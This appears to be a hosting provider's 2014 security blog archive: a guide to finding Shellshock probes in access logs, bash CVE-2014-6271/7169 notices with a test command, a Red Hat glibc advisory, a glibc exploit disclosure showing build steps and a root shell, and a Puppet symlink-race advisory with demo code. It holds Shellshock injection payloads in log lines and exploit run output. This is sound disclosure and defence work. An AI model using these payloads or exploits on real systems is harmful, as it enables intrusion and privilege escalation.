
How to scan access_log for Shellshock attempts via httpd

In the previous post, we announced the discovery of the remote bash vulnerability which has been dubbed “Shellshock” throughout the security and Linux communities.

As you may know, bash supports exporting shell variables as well as shell functions to other bash instances. This is accomplished by passing them through the process environment to a child process.

We previously reported that one of the major attack vectors identified for this flaw was HTTP requests to CGI scripts. Nearly a week later, we are seeing (on our own servers) attempts to exploit this vulnerability via apache/httpd, and here is how you can check your own access_logs to see whether you have been targeted.

NOTE: IF YOU HAVE NOT UPDATED/PATCHED YOUR BASH YET, YOU SHOULD SKIP THIS POST AND DO THAT IMMEDIATELY.

Inside a directory containing your access_log file(s):

find . -name '*access_log*' -execdir \
grep --color=always -HE '\(.*\).*\{.*\}.*"' {} +

Example output showing attempts to exploit via httpd:

./access_log:37.128.189.183 - - [02/Oct/2014:14:39:14 -0700] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 403 228
./access_log:37.128.189.183 - - [02/Oct/2014:14:39:14 -0700] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 403 228
./access_log:95.211.131.148 - - [02/Oct/2014:14:39:22 -0700] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 403 228
./access_log:95.211.131.148 - - [02/Oct/2014:14:39:22 -0700] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 403 228
./access_log:209.11.159.26 - - [02/Oct/2014:23:45:48 -0700] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 403 228
./access_log:209.11.159.26 - - [02/Oct/2014:23:45:48 -0700] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 403 228
./access_log:177.87.80.17 - - [03/Oct/2014:03:00:20 -0700] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 403 228
./access_log:177.87.80.17 - - [03/Oct/2014:03:00:20 -0700] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 403 228
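The grep above catches the pattern shown in the output, but a scanner that parses each log line also lets you group hits by source address, check the Referer and User-Agent fields of the combined log format, and notice when a probe was served with a 2xx instead of being refused. The following Python script is an added example, not code from the original post; its log lines are constructed samples in the same format, not the post's own log, and the field names it returns are its own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache common/combined log format (not taken from the
# post's own log). Lines 1-3 carry a Shellshock-style function definition in
# different places; line 4 is benign.
SAMPLE_LOG = r'''
203.0.113.10 - - [02/Oct/2014:14:39:14 -0700] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 403 228
203.0.113.11 - - [02/Oct/2014:14:40:01 -0700] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; echo probe"
203.0.113.12 - - [03/Oct/2014:03:00:20 -0700] "GET /?x=%28%29%20%7B%20%3A%3B%7D%3B%20echo%20hi HTTP/1.0" 403 228
198.51.100.7 - - [03/Oct/2014:03:01:00 -0700] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
'''

# Common log format plus the optional referer and user-agent fields of the combined
# format. Quoted fields may contain \" escapes, which Apache emits for literal quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)")?'
)

# The tell-tale function-definition prefix: "()" followed by "{", with optional spaces.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def scan_line(line):
    """Return a finding dict for a Shellshock-style line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for field in ("request", "referer", "agent"):
        value = m.group(field)
        if not value:
            continue
        # Check both the raw field and its URL-decoded form, since the payload may
        # arrive percent-encoded in the query string.
        for candidate in (value, unquote(value)):
            if SHELLSHOCK_RE.search(candidate):
                status = int(m.group("status"))
                return {
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "field": field,
                    "status": status,
                    "payload": candidate,
                    # A 2xx means the request reached a handler; 403/404 were refused.
                    "review": 200 <= status < 300,
                }
    return None


def scan_log(text):
    """Scan a whole log body and return the list of findings in log order."""
    return [hit for hit in (scan_line(line) for line in text.splitlines()) if hit]


def summarize(hits):
    """Group findings by source IP so repeated probes from one host collapse."""
    by_ip = {}
    for hit in hits:
        by_ip.setdefault(hit["ip"], []).append(hit)
    return by_ip


if __name__ == "__main__":
    for ip, items in summarize(scan_log(SAMPLE_LOG)).items():
        flag = "REVIEW" if any(h["review"] for h in items) else "refused"
        print(f"{ip}: {len(items)} attempt(s) [{flag}] first seen {items[0]['time']}")
```

Run it against a real file with `scan_log(open("access_log").read())`. A hit with `review` set means the server passed the request to a handler rather than refusing it, which is the case worth investigating on a host that was unpatched at the time; the 403s in the output above were refused outright.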

Remote vulnerability in bash – patches available for CVE-2014-6271, CVE-2014-7169

Bash, or the Bourne-again shell, is a UNIX-like shell and perhaps one of the most widely installed utilities on any Linux system. Since its creation in the 1980s, bash has evolved from a simple terminal-based command interpreter into a tool with many other uses.

In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consist of a name with a value assigned to it. The same is true of the bash shell. Many programs run a bash shell in the background: it is often used to provide a shell to a remote user (via ssh or telnet, for example), to provide an interpreter for CGI scripts (Apache, etc.), or to provide limited command execution support (git, etc.).

A remotely exploitable vulnerability was discovered and disclosed publicly today by Stephane Chazelas, and it is extremely unpleasant. The vulnerability has the CVE identifier CVE-2014-6271.

As you may know, bash supports exporting shell variables as well as shell functions to other bash instances. This is accomplished by passing them through the process environment to a child process.

The major attack vectors that have been identified in this case are:

  • HTTP requests and CGI scripts
  • OpenSSH using the SSH_ORIGINAL_COMMAND setting
  • Various daemons and SUID/privileged programs
  • Any other application using bash as the interpreter

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable). Something like:


$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

The patch used to fix this flaw ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get output similar to:


$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
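To run the same check across many hosts it helps to have it as a function with a pass/fail result rather than eyeballing terminal output. The script below is an added example, not part of the original post: it wraps the probe shown above (`x='() { :;}; echo vulnerable'`) in a Python function that runs it against a bash binary and reports whether the trailing `echo` executed. The `check_bash_cve_2014_6271` name and the returned dictionary keys are this example's own.

```python
import os
import shutil
import subprocess

# The probe is the one the post shows: a function definition with trailing code,
# passed through the environment to a child bash.
PROBE_VAR = "x"
PROBE_VALUE = "() { :;}; echo vulnerable"


def check_bash_cve_2014_6271(bash_path=None):
    """Run the post's probe against a bash binary.

    Returns a dict with 'vulnerable' (True if the trailing 'echo vulnerable' ran),
    'child_ran' (the child's own command produced output) and stderr for the record,
    or None when no usable bash binary is found.
    """
    path = bash_path or shutil.which("bash")
    if path is None or not os.access(path, os.X_OK):
        return None
    env = dict(os.environ)
    env[PROBE_VAR] = PROBE_VALUE
    proc = subprocess.run([path, "-c", "echo this is a test"],
                          env=env, capture_output=True, text=True)
    out_lines = proc.stdout.splitlines()
    return {
        "bash": path,
        # The trailing code ran only if its output shows up in the child's stdout.
        "vulnerable": "vulnerable" in out_lines,
        "child_ran": "this is a test" in out_lines,
        # Patched 4.x builds print "ignoring function definition attempt" here;
        # later builds that changed the export format print nothing at all.
        "stderr": proc.stderr.strip(),
    }


if __name__ == "__main__":
    result = check_bash_cve_2014_6271()
    if result is None:
        print("no bash binary found")
    else:
        print("VULNERABLE" if result["vulnerable"] else "patched", result["bash"])
        if result["stderr"]:
            print(result["stderr"])
```

The function only looks at stdout for its verdict; the stderr warning varies between patched versions, so it is reported but not relied upon.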

We will continue to monitor the situation very closely. We expect proof of concept (PoC) exploits to be authored and distributed over the next few days. There is also the potential for variants of the original vulnerability, which may require further patching if other attack vectors or methods are found.

If you have any servers connected to the internet with bash installed, it is strongly recommended that you update bash. Many Linux distributions have already released a patched bash package into their repositories.



Sources:
http://www.pcworld.com/article/2687857/bigger-than-heartbleed-shellshock-flaw-leaves-os-x-linux-more-open-to-attack.html
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
http://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html
http://linux.slashdot.org/story/14/09/24/1638207/remote-exploit-vulnerability-found-in-bash
http://seclists.org/oss-sec/2014/q3/651



Update: 9/25/2014 4:00PM EDT

We have become aware that the patch for CVE-2014-6271 is incomplete. An attacker can still provide specially crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169. See also "Resolution for Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271) in Red Hat Enterprise Linux". Red Hat and CentOS are working on patches in conjunction with the upstream developers as a critical priority.

Red Hat advises customers to upgrade to the version of Bash which contains the fix for CVE-2014-6271, and not wait for the patch which fixes CVE-2014-7169. CVE-2014-7169 is a less severe issue and patches for it are being worked on.



Update: 9/26/2014 10:00AM EDT

We have obtained patches for CVE-2014-7169 and we strongly advise everyone to update their systems immediately!

Download patches

glibc arbitrary code execution vulnerability (CVE-2014-0475 and CVE-2014-5119)

Two new vulnerabilities rated Important severity have been discovered and patched in the glibc libraries.

In order for the updates to take effect, every daemon with a glibc dependency must be restarted. This includes, but is not limited to: Apache, MySQL, mail services, SSH, etc.

=====================================================================
Red Hat Security Advisory

Synopsis: Important: glibc security update
Advisory ID: RHSA-2014:1118-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1118.html
Issue date: 2014-09-02
CVE Names: CVE-2014-5119
=====================================================================

1. Summary:

Updated glibc packages that fix one security issue are now available for
Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9
Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update
Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.

Red Hat Product Security has rated this update as having Important security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AUS (v. 6.2 server) - x86_64
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4) - x86_64
Red Hat Enterprise Linux EUS (v. 5.9 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux HPC Node EUS (v. 6.4) - x86_64
Red Hat Enterprise Linux LL (v. 5.6 server) - i386, ia64, x86_64
Red Hat Enterprise Linux Server EUS (v. 6.4) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64
Red Hat Enterprise Linux Server Optional EUS (v. 6.4) - i386, ppc64, s390x, x86_64

3. Description:

The glibc packages contain the standard C libraries used by multiple
programs on the system. These packages contain the standard C and the
standard math libraries. Without these two libraries, a Linux system cannot
function properly.

An off-by-one heap-based buffer overflow flaw was found in glibc’s internal
__gconv_translit_find() function. An attacker able to make an application
call the iconv_open() function with a specially crafted argument could
possibly use this flaw to execute arbitrary code with the privileges of
that application. (CVE-2014-5119)

All glibc users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1119128 - CVE-2014-5119 glibc: off-by-one error leading to a heap-based buffer overflow flaw in __gconv_translit_find()

6. Package List:

Red Hat Enterprise Linux LL (v. 5.6 server):

Source:
glibc-2.5-58.el5_6.5.src.rpm

i386:
glibc-2.5-58.el5_6.5.i386.rpm
glibc-2.5-58.el5_6.5.i686.rpm
glibc-common-2.5-58.el5_6.5.i386.rpm
glibc-debuginfo-2.5-58.el5_6.5.i386.rpm
glibc-debuginfo-2.5-58.el5_6.5.i686.rpm
glibc-debuginfo-common-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.i386.rpm
glibc-headers-2.5-58.el5_6.5.i386.rpm
glibc-utils-2.5-58.el5_6.5.i386.rpm
nscd-2.5-58.el5_6.5.i386.rpm

ia64:
glibc-2.5-58.el5_6.5.i686.rpm
glibc-2.5-58.el5_6.5.ia64.rpm
glibc-common-2.5-58.el5_6.5.ia64.rpm
glibc-debuginfo-2.5-58.el5_6.5.i686.rpm
glibc-debuginfo-2.5-58.el5_6.5.ia64.rpm
glibc-debuginfo-common-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.ia64.rpm
glibc-headers-2.5-58.el5_6.5.ia64.rpm
glibc-utils-2.5-58.el5_6.5.ia64.rpm
nscd-2.5-58.el5_6.5.ia64.rpm

x86_64:
glibc-2.5-58.el5_6.5.i686.rpm
glibc-2.5-58.el5_6.5.x86_64.rpm
glibc-common-2.5-58.el5_6.5.x86_64.rpm
glibc-debuginfo-2.5-58.el5_6.5.i386.rpm
glibc-debuginfo-2.5-58.el5_6.5.i686.rpm
glibc-debuginfo-2.5-58.el5_6.5.x86_64.rpm
glibc-debuginfo-common-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.x86_64.rpm
glibc-headers-2.5-58.el5_6.5.x86_64.rpm
glibc-utils-2.5-58.el5_6.5.x86_64.rpm
nscd-2.5-58.el5_6.5.x86_64.rpm

Red Hat Enterprise Linux EUS (v. 5.9 server):

Source:
glibc-2.5-107.el5_9.7.src.rpm

i386:
glibc-2.5-107.el5_9.7.i386.rpm
glibc-2.5-107.el5_9.7.i686.rpm
glibc-common-2.5-107.el5_9.7.i386.rpm
glibc-debuginfo-2.5-107.el5_9.7.i386.rpm
glibc-debuginfo-2.5-107.el5_9.7.i686.rpm
glibc-debuginfo-common-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.i386.rpm
glibc-headers-2.5-107.el5_9.7.i386.rpm
glibc-utils-2.5-107.el5_9.7.i386.rpm
nscd-2.5-107.el5_9.7.i386.rpm

ia64:
glibc-2.5-107.el5_9.7.i686.rpm
glibc-2.5-107.el5_9.7.ia64.rpm
glibc-common-2.5-107.el5_9.7.ia64.rpm
glibc-debuginfo-2.5-107.el5_9.7.i686.rpm
glibc-debuginfo-2.5-107.el5_9.7.ia64.rpm
glibc-debuginfo-common-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.ia64.rpm
glibc-headers-2.5-107.el5_9.7.ia64.rpm
glibc-utils-2.5-107.el5_9.7.ia64.rpm
nscd-2.5-107.el5_9.7.ia64.rpm

ppc:
glibc-2.5-107.el5_9.7.ppc.rpm
glibc-2.5-107.el5_9.7.ppc64.rpm
glibc-common-2.5-107.el5_9.7.ppc.rpm
glibc-debuginfo-2.5-107.el5_9.7.ppc.rpm
glibc-debuginfo-2.5-107.el5_9.7.ppc64.rpm
glibc-devel-2.5-107.el5_9.7.ppc.rpm
glibc-devel-2.5-107.el5_9.7.ppc64.rpm
glibc-headers-2.5-107.el5_9.7.ppc.rpm
glibc-utils-2.5-107.el5_9.7.ppc.rpm
nscd-2.5-107.el5_9.7.ppc.rpm

s390x:
glibc-2.5-107.el5_9.7.s390.rpm
glibc-2.5-107.el5_9.7.s390x.rpm
glibc-common-2.5-107.el5_9.7.s390x.rpm
glibc-debuginfo-2.5-107.el5_9.7.s390.rpm
glibc-debuginfo-2.5-107.el5_9.7.s390x.rpm
glibc-devel-2.5-107.el5_9.7.s390.rpm
glibc-devel-2.5-107.el5_9.7.s390x.rpm
glibc-headers-2.5-107.el5_9.7.s390x.rpm
glibc-utils-2.5-107.el5_9.7.s390x.rpm
nscd-2.5-107.el5_9.7.s390x.rpm

x86_64:
glibc-2.5-107.el5_9.7.i686.rpm
glibc-2.5-107.el5_9.7.x86_64.rpm
glibc-common-2.5-107.el5_9.7.x86_64.rpm
glibc-debuginfo-2.5-107.el5_9.7.i386.rpm
glibc-debuginfo-2.5-107.el5_9.7.i686.rpm
glibc-debuginfo-2.5-107.el5_9.7.x86_64.rpm
glibc-debuginfo-common-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.x86_64.rpm
glibc-headers-2.5-107.el5_9.7.x86_64.rpm
glibc-utils-2.5-107.el5_9.7.x86_64.rpm
nscd-2.5-107.el5_9.7.x86_64.rpm

Red Hat Enterprise Linux HPC Node EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

x86_64:
glibc-2.12-1.107.el6_4.6.i686.rpm
glibc-2.12-1.107.el6_4.6.x86_64.rpm
glibc-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-devel-2.12-1.107.el6_4.6.i686.rpm
glibc-devel-2.12-1.107.el6_4.6.x86_64.rpm
glibc-headers-2.12-1.107.el6_4.6.x86_64.rpm
glibc-utils-2.12-1.107.el6_4.6.x86_64.rpm
nscd-2.12-1.107.el6_4.6.x86_64.rpm

Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

x86_64:
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-static-2.12-1.107.el6_4.6.i686.rpm
glibc-static-2.12-1.107.el6_4.6.x86_64.rpm

Red Hat Enterprise Linux AUS (v. 6.2 server):

Source:
glibc-2.12-1.47.el6_2.13.src.rpm

x86_64:
glibc-2.12-1.47.el6_2.13.i686.rpm
glibc-2.12-1.47.el6_2.13.x86_64.rpm
glibc-common-2.12-1.47.el6_2.13.x86_64.rpm
glibc-debuginfo-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-2.12-1.47.el6_2.13.x86_64.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.x86_64.rpm
glibc-devel-2.12-1.47.el6_2.13.i686.rpm
glibc-devel-2.12-1.47.el6_2.13.x86_64.rpm
glibc-headers-2.12-1.47.el6_2.13.x86_64.rpm
glibc-utils-2.12-1.47.el6_2.13.x86_64.rpm
nscd-2.12-1.47.el6_2.13.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

i386:
glibc-2.12-1.107.el6_4.6.i686.rpm
glibc-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-devel-2.12-1.107.el6_4.6.i686.rpm
glibc-headers-2.12-1.107.el6_4.6.i686.rpm
glibc-utils-2.12-1.107.el6_4.6.i686.rpm
nscd-2.12-1.107.el6_4.6.i686.rpm

ppc64:
glibc-2.12-1.107.el6_4.6.ppc.rpm
glibc-2.12-1.107.el6_4.6.ppc64.rpm
glibc-common-2.12-1.107.el6_4.6.ppc64.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.ppc64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc64.rpm
glibc-devel-2.12-1.107.el6_4.6.ppc.rpm
glibc-devel-2.12-1.107.el6_4.6.ppc64.rpm
glibc-headers-2.12-1.107.el6_4.6.ppc64.rpm
glibc-utils-2.12-1.107.el6_4.6.ppc64.rpm
nscd-2.12-1.107.el6_4.6.ppc64.rpm

s390x:
glibc-2.12-1.107.el6_4.6.s390.rpm
glibc-2.12-1.107.el6_4.6.s390x.rpm
glibc-common-2.12-1.107.el6_4.6.s390x.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.s390x.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390x.rpm
glibc-devel-2.12-1.107.el6_4.6.s390.rpm
glibc-devel-2.12-1.107.el6_4.6.s390x.rpm
glibc-headers-2.12-1.107.el6_4.6.s390x.rpm
glibc-utils-2.12-1.107.el6_4.6.s390x.rpm
nscd-2.12-1.107.el6_4.6.s390x.rpm

x86_64:
glibc-2.12-1.107.el6_4.6.i686.rpm
glibc-2.12-1.107.el6_4.6.x86_64.rpm
glibc-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-devel-2.12-1.107.el6_4.6.i686.rpm
glibc-devel-2.12-1.107.el6_4.6.x86_64.rpm
glibc-headers-2.12-1.107.el6_4.6.x86_64.rpm
glibc-utils-2.12-1.107.el6_4.6.x86_64.rpm
nscd-2.12-1.107.el6_4.6.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 6.2):

Source:
glibc-2.12-1.47.el6_2.13.src.rpm

x86_64:
glibc-debuginfo-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-2.12-1.47.el6_2.13.x86_64.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.x86_64.rpm
glibc-static-2.12-1.47.el6_2.13.i686.rpm
glibc-static-2.12-1.47.el6_2.13.x86_64.rpm

Red Hat Enterprise Linux Server Optional EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

i386:
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-static-2.12-1.107.el6_4.6.i686.rpm

ppc64:
glibc-debuginfo-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.ppc64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc64.rpm
glibc-static-2.12-1.107.el6_4.6.ppc.rpm
glibc-static-2.12-1.107.el6_4.6.ppc64.rpm

s390x:
glibc-debuginfo-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.s390x.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390x.rpm
glibc-static-2.12-1.107.el6_4.6.s390.rpm
glibc-static-2.12-1.107.el6_4.6.s390x.rpm

x86_64:
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-static-2.12-1.107.el6_4.6.i686.rpm
glibc-static-2.12-1.107.el6_4.6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from

https://access.redhat.com/security/team/key/#package

7. References:

https://www.redhat.com/security/data/cve/CVE-2014-5119.html

https://access.redhat.com/security/updates/classification/#important

https://access.redhat.com/solutions/1176253

CVE-2014-5119 glibc __gconv_translit_find() exploit

Date: Mon, 25 Aug 2014 19:00:15 -0700
From: Tavis Ormandy
To: fulldisclosure@…lists.org, oss-security@…ts.openwall.com
Subject: CVE-2014-5119 glibc __gconv_translit_find() exploit

List, back in July, I described CVE-2014-5119, a fiendish single-fixed-byte
heap metadata overflow in the glibc internal routine
__gconv_translit_find().

This is caused by the file extension being incorrectly appended to the
transliteration module filename. The result is one too few bytes are
allocated, and a single nul byte is written out of bounds. This issue
affects real programs, that are typically default installed and setuid root.

Despite explaining that my research suggests this is exploitable, it
appears there has been general skepticism that single-fixed-byte overflows
are still exploitable with modern allocator metadata hardening.

As a result, the issue has been largely dismissed and downgraded in
severity. As little progress has been made in resolving the issue thus far,
we’re publishing a proof of concept today. This exploit is specific to
Fedora 20 32-bit, but the issue is not specific to Fedora, and exploitation
on other systems and platforms is possible.

This issue is complex, and fiendishly difficult to exploit. Thanks to Chris
Evans for his heap expertise and insight. Some more information is
available on our team blog.

http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html

$ make clean
rm -f pkexploit pty *.o a.out *.so
[taviso@...alhost glibc]$ make
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl pkexploit.c -o pkexploit
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl pty.c -o pty
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -c
-o exploit.o exploit.c
cc exploit.o -fPIC -shared -o exploit.so
Execute pkexploit to attempt exploitation.
[taviso@...alhost glibc]$ ./pkexploit
[*] ---------------------------------------------------
[*] CVE-2014-5119 glibc __gconv_translit_find() exploit
[*] ------------------------ taviso & scarybeasts -----
[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...
[*] Read 7295 bytes of output from pseudo-pty helper, parsing...
[*] pseudo-pty helper succeeded
[*] attempting to parse libc fatal error message...
[*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658
[*] attempting to parse the libc maps dump...
[*] found libc.so mapped @0x40215000
[*] expecting libc.so bss to begin at 0x406c7000
[*] successfully located first morecore chunk w/tag @0x407d6000
[*] allocating space for argument structure...
[*] creating command string...
[*] creating a tls_dtor_list node...
[*] open_translit() symbol will be at 0x40238320
[*] offsetof(struct known_trans, fname) => 32
[*] appending `./exploit.so` to list node
[*] building parameter list...
[*] anticipating tls_dtor_list to be at 0x406c82d4
[*] execvpe(pkexec...)...
Error accessing / : File name too long
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit

SimFS (VZ / OpenVZ) Security Vulnerability #PSBM-27641, #CVE-2014-3519

***UPDATE IMMEDIATELY – Vulnerability in simfs virtual filesystem***

A critical vulnerability in the legacy simfs Container filesystem was fixed. This affects OpenVZ and Parallels Virtuozzo Containers based on vzfs.

Note: ploop filesystems were not affected.

References:

http://www.webhostingtalk.com/showpo…0&postcount=38

https://openvz.org/Download/kernel/rhel6/042stab090.5

http://kb.parallels.com/en/122142

CVE-2013-4969: Puppet Vulnerability

Description

Puppet uses temp files unsafely by looking for a name it can use in a
directory, and then later writing to that file, creating a
vulnerability in which an attacker could make the name a symlink to
another file and thereby cause the puppet agent to overwrite something
that it did not intend to.
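The bug class described above is a time-of-check/time-of-use race on a file name: the program picks a name, and by the time it opens that name a symlink may have been planted there, so the write lands on whatever the link points to. The Python script below is an added example and is not Puppet's code; it shows the vulnerable pattern beside a hardened writer (create under a random name with O_CREAT|O_EXCL via `mkstemp`, then atomically rename over the final name) and a `demonstrate()` routine that plants a symlink and reports what each writer did. All file and function names are this example's own.

```python
import os
import tempfile


def write_unsafe(directory, name, data):
    """The pattern described in the advisory: choose a name in a directory, then
    open it later. If someone planted a symlink at that name in between, open()
    follows it and the write lands on the symlink's target."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write(data)
    return path


def write_safe(directory, name, data):
    """Create the file under a random name with O_CREAT|O_EXCL (mkstemp), write it,
    then atomically rename it over the final name. rename() replaces the directory
    entry without following a symlink that sits there, so a planted link is
    discarded rather than followed."""
    fd, tmp_path = tempfile.mkstemp(dir=directory, prefix=name + ".")
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(data)
            fh.flush()
            os.fsync(fh.fileno())
        final = os.path.join(directory, name)
        os.replace(tmp_path, final)
        return final
    except BaseException:
        try:
            os.unlink(tmp_path)
        except OSError:
            pass
        raise


def demonstrate():
    """Plant a symlink at the name each writer will use and report what happened.
    Everything lives in a throwaway temporary directory."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim")        # a file the writer should never touch
        target_name = "agent_state.tmp"           # the name the writer intends to use
        target = os.path.join(d, target_name)

        with open(victim, "w") as fh:
            fh.write("original")
        os.symlink(victim, target)                # the planted link

        write_unsafe(d, target_name, "clobbered")
        with open(victim) as fh:
            results["unsafe_overwrote_victim"] = fh.read() == "clobbered"

        # Reset the victim; the symlink is still in place for the second attempt.
        with open(victim, "w") as fh:
            fh.write("original")
        write_safe(d, target_name, "fresh")
        with open(victim) as fh:
            results["safe_left_victim_intact"] = fh.read() == "original"
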